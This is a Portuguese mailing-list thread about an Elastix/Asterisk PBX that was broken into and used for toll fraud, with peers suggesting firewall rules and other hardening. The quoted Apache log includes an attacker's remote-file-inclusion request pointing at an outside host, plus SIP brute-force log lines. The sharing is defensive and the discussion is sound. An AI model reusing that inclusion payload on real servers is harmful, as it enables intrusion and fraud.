sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; *Gleidison C. Sampaio* Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com mailto:alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com mailto:gleidison.samp...@hotmail.com CC: asteriskbrasil@listas.asteriskbrasil.org mailto:asteriskbrasil@listas.asteriskbrasil.org Opa, Alejandro, Na verdade nao sou la aqueles especialistas, poderia me dizer onde verifico o log dos ramais, tipo o IP Publico que cada ramal se logou
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Com o exemplo do JOCA, não é necessário o uso do fail2ban e nem a alteração de porta (estas opções são para situações onde nao se tem um ponto fixo de clientes, assim as conexões partem de qualquer parte do mundo). =D Em 23 de novembro de 2010 14:54, Joca joca_jun...@terra.com.br escreveu: Usa o iptables tmb exemplo abaixo #ip publico do asterisk IP=200.x.x.x #ips da filial FILIAL1=189.x.x.x FILIAL2=188.x.x.x FILIAL3=187.x.x.x FILIAL4=186.x.x.x iptables -A INPUT -s $FILIAL1 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL1 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s $FILIAL2 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL2 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s $FILIAL3 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL3 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s $FILIAL4 -d $IP -p all --dport 5060 -j ACCEPT iptables -A OUTPUT -d $FILIAL4 -s $IP -p all --sport 5060 -j ACCEPT iptables -A INPUT -s 0/0 -d $IP -p all --dport 5060 -j DROP iptables -A OUTPUT -d 0/0 -s $IP -p all --sport 5060 -j DROP Gian Nicodemus wrote: Num rola de implementar um fail2ban no elastix?? -- Gian Nicodemus Analista de sistemas giannicode...@gmail.com mailto:giannicode...@gmail.com Em 23 de novembro de 2010 13:56, Nielsen Alves de Oliveira niel...@freesolutions.com.br mailto:niel...@freesolutions.com.br escreveu: Mais uma dica muito boa do colaborador Wagner, alterar a porta padrão, pois todos os SCRIPTS MALICIOSOS estão orientados as portas padrões. Sobre a call-limit=NUMERO DE LIGAÇÕES esta configuração fica no arquivo sip.conf em [general] call-limit=3 (numero de ligações simultaneas que é permitida pelo ramal) OU SETAR INDIVIDUAL POR CADA RAMAL(EXTENSION) =] VEJA MAIS ABAIXO http://www.voip-info.org/wiki/view/Asterisk+config+sip.conf Vlw. Em 23 de novembro de 2010 09:41, Wagner wag...@beetelecom.com.br mailto:wag...@beetelecom.com.br escreveu: Gleidison, A caracteristica deste log indica que o ataque sofrido foi do tipo força bruta, como mencionei na lista técnica se possivel tente alterar a porta padrão 5060, isso é claro requer que todos os seus peers sejam reprogramados porém obtive bons resultados com esta alteração em meu ambiente. Att Wagner Penha - Original Message - *From:* Gleidison Sampaio mailto:gleidison.samp...@hotmail.com *To:* alejandrorflo...@gmail.com mailto:alejandrorflo...@gmail.com *Cc:* Asterisk Lista mailto:asteriskbrasil@listas.asteriskbrasil.org *Sent:* Monday, November 22, 2010 5:49 PM *Subject:* Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Para minha Surpresa tem um IP dos EUA, mais tem um arquivo de log de mais de 40 mb só com essa mensagem. caso alguem tenha alguma dica, alem de reforçar a senha, que ja criei uma que EU nunca vou decorar essa senha, com caracteres, letras, numeros, maiusculas e minusculas, porem uma dica para aumentar mais a segurança vai bem, e pra garantir tbem estou subindo essa maquina em outro IP com uma faixa bem diferente. [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found [Nov 20 04:43:40] NOTICE[2531] chan_sip.c: Registration from '3450595069 sip:3450595...@ip do meu Asterisk' failed for '184.106.132.239' - No matching peer found Att; *Gleidison C. Sampaio* Date: Mon, 22 Nov 2010 16:33:22 -0300 Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 From: alejandrorflo...@gmail.com mailto:alejandrorflo...@gmail.com To: gleidison.samp...@hotmail.com mailto:gleidison.samp...@hotmail.com CC
[AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Att; Gleidison C. Sampaio From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000];fullname = Joe User;email = j...@foo.bar;secret = ;zapchan = 1;hasvoicemail = yes;vmsecret = ;hassip = yes;hasiax = no;hash323 = no;hasmanager = no;callwaiting = no;context = internationalAtt; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte t�cnico local qualificado e gratuito Conhe�a a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discuss�es AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Att; *Gleidison C. Sampaio* -- From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). *De:* asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto: asteriskbrasil-boun...@listas.asteriskbrasil.org] *Em nome de *Gleidison Sampaio *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40 *Para:* Asterisk Lista *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; *Gleidison C. Sampaio* ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte t�cnico local qualificado e gratuito Conhe�a a linha completa de produtos KHOMP em www.khomp.com.br___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br__ Lista de discuss�es AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil__ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org -- At. Nielsen Alves de Oliveira Consultor em Sistemas Computacionais CIO Free Solutions Telefone: (65) 3025-7356 Celular: (65) 9287-5331 (Vivo) ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Quais portas voce tem aberto para fora que sao direcionadas para esse asterisk? Em 22 de novembro de 2010 12:20, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Att; *Gleidison C. Sampaio* -- From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). *De:* asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto: asteriskbrasil-boun...@listas.asteriskbrasil.org] *Em nome de *Gleidison Sampaio *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40 *Para:* Asterisk Lista *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; *Gleidison C. Sampaio* ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte t�cnico local qualificado e gratuito Conhe�a a linha completa de produtos KHOMP em www.khomp.com.br___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br__ Lista de discuss�es AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil__ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Sim no Elastix 1.6 ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar. 2010-11-21 21:14:0100393396976261SIP/TRUNK SIP/TRUNKANSWERED1045 Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:27:16 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Att; Gleidison C. Sampaio From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User;email = j...@foo.bar;secret = ;zapchan = 1;hasvoicemail = yes;vmsecret = ;hassip = yes;hasiax = no;hash323 = no;hasmanager = no ;callwaiting = no;context = international Att; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação. Pensou nisso tudo ? No final das contas é preciso a auditoria para identificar a origem da invasão. Em 22 de novembro de 2010 13:40, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sim no Elastix 1.6 ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar. 2010-11-21 21:14:01 00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 Att; *Gleidison C. Sampaio* -- From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:27:16 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Att; *Gleidison C. Sampaio* -- From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). *De:* asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto: asteriskbrasil-boun...@listas.asteriskbrasil.org] *Em nome de *Gleidison Sampaio *Enviada em:* segunda-feira, 22 de novembro de 2010 13:40 *Para:* Asterisk Lista *Assunto:* [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; *Gleidison C. Sampaio* ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org -- At. Nielsen Alves de Oliveira Consultor em Sistemas Computacionais CIO Free Solutions Telefone: (65) 3025-7356 Celular: (65) 9287-5331 (Vivo) ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
Nielsen, Cara, rodei tudo quanto é coisa na maquina do cliente, essa parte foi facil, até porque só tem uma maquina em cada filial, nao detectei nada, até porque tem um firewall que barra tudo quanto é acesso, mais enfim o fato é que eu gostaria de saber, o que posso fazer pra tornar mais seguro pra evitar essas invasões. Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:51:04 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Bom eles autenticaram numa boa ? Vc está utilizando senhas fortes ? provavelmente eles monitoraram seu server e conseguiram uma senha ... Muito estranho vc fez uma auditoria nos logs ? Pode ser que algum de seus clientes esteja com trojan, este enviou as informações e no meio delas foram os dados de autenticação. Pensou nisso tudo ? No final das contas é preciso a auditoria para identificar a origem da invasão. Em 22 de novembro de 2010 13:40, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sim no Elastix 1.6 ele se encontra em um Co-location dentro da GVT em uma maquina virtual, com IP Publico e tenho ramais distribuidos em 5 filiais diferentes, esses ramais estao logados atraves de Linksys SPA2102 todos estes atras de Firewall, e o que notei no CDR foi que fizeram ligaçoes apenas um ramal, e em duas horas durante a madrugada os caras arrebentaram de ligar. 2010-11-21 21:14:01 00393396976261 SIP/TRUNK SIP/TRUNKANSWERED 1045 Att; Gleidison C. Sampaio From: niel...@freesolutions.com.br Date: Mon, 22 Nov 2010 13:27:16 -0300 To: asteriskbrasil@listas.asteriskbrasil.org Subject: Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Opa, foi no seu ELASTIX 1.6? Qual a posição que se encontra seu servidor voip na sua rede ? Em 22 de novembro de 2010 13:20, Gleidison Sampaio gleidison.samp...@hotmail.com escreveu: Sidinei, Obrigado pela Resposta, cara sofri uma invasao essa madrugada, e os caras arrebentaram de ligaçoes para a Italia, abaixo peguei o seguinte log. e os caras fizeram um rombo. alguem poderia me ajudar a bloquear isso. /var/log/httpd/access_log 72.167.164.44 - - [20/Nov/2010:01:34:19 -0200] GET /user/soapCaller.bs HTTP/1.1 302 305 - Morfeus Fucking Scanner 72.167.164.44 - - [20/Nov/2010:02:01:53 -0200] GET /appserv/main.php?appserv_root=http://88.255.225.20/appserv/t.txt? HTTP/1.1 302 354 - Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Att; Gleidison C. Sampaio From: sidnei...@ig.com.br To: asteriskbrasil@listas.asteriskbrasil.org Date: Mon, 22 Nov 2010 14:00:10 -0200 Subject: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6 Não, pois estão todas as linhas comentadas (é só um exemplo). De: asteriskbrasil-boun...@listas.asteriskbrasil.org [mailto:asteriskbrasil-boun...@listas.asteriskbrasil.org] Em nome de Gleidison Sampaio Enviada em: segunda-feira, 22 de novembro de 2010 13:40 Para: Asterisk Lista Assunto: [AsteriskBrasil] Duvida ( SEGURANÇA ) Elastix 1.6 Boa tarde Lista! hoje fuçando nas configuraçoes do meu PBX eu abri a seguinte configuraçao, e gostaria de saber se isso da permissao a algum acesso no meu servidor /etc/asterisk/users.conf ;[6000] ;fullname = Joe User ;email = j...@foo.bar ;secret = ;zapchan = 1 ;hasvoicemail = yes ;vmsecret = ;hassip = yes ;hasiax = no ;hash323 = no ;hasmanager = no ;callwaiting = no ;context = international Att; Gleidison C. Sampaio ___ KHOMP: qualidade em placas de E1, GSM, FXS e FXO para Asterisk. - Hardware com alta disponibilidade de recursos e qualidade KHOMP - Suporte técnico local qualificado e gratuito Conheça a linha completa de produtos KHOMP em www.khomp.com.br ___ Temos tudo para seu projeto VoIP com Asterisk! Descontos especiais para assinantes da AsteriskBrasil.org. Registre-se e receba um cupom exclusivo de desconto! Acesse agora www.voipmania.com.br __ Lista de discussões AsteriskBrasil.org AsteriskBrasil@listas.asteriskbrasil.org http://listas.asteriskbrasil.org/mailman/listinfo/asteriskbrasil __ Para remover seu email desta lista, basta enviar um email em branco para asteriskbrasil-unsubscr...@listas.asteriskbrasil.org
Re: [AsteriskBrasil] RES: Duvida ( SEGURANÇA ) Elastix 1.6
